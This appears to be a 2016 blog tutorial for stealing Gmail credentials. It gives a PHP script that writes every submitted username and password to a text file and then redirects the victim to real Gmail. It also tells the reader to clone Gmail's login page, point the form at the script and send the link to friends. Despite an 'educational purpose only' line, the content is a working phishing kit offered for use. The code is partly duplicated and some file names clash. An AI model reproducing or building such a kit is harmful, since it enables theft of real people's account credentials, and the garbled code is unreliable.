How to Hack Gmail Account Using Phishing

THIS TUTORIAL IS FOR EDUCATIONAL PURPOSE ONLY.
open your notepad or text editor and paste the given below code & save as get_id_pass.php
<?php
header(“Location: https://mail.google.com/mail/”);
$handle = fopen(“passwords.txt”, “a”);
foreach($_GET as $variable => $value) {fwrite($handle, $variable);fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>
$handle = fopen(“passwords.txt”, “a”);
foreach($_GET as $variable => $value) {fwrite($handle, $variable);fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>
Step : 1 Go to gmail.com, when page is fully open press ctrl+S & save file as index.html. or right click on the page to view page source.
Step: 2 Open index.html file and press ctrl+F For Search for action” and you see given below figure

Step: 3 Replace method post to GET and action URL to your phishing URL get_it_pass.php
Step: 4 Create a one text file password.txt, Now your Gmail Phishing Page is ready upload all file to you website & send it to your friends, when someone login from your phishing page all Email & Password store on paswords.txt.
How to Hack Gmail Account Using Phishing
Reviewed by legit exam
on
September 14, 2016
Rating:
Reviewed by legit exam
on
September 14, 2016
Rating:
No comments: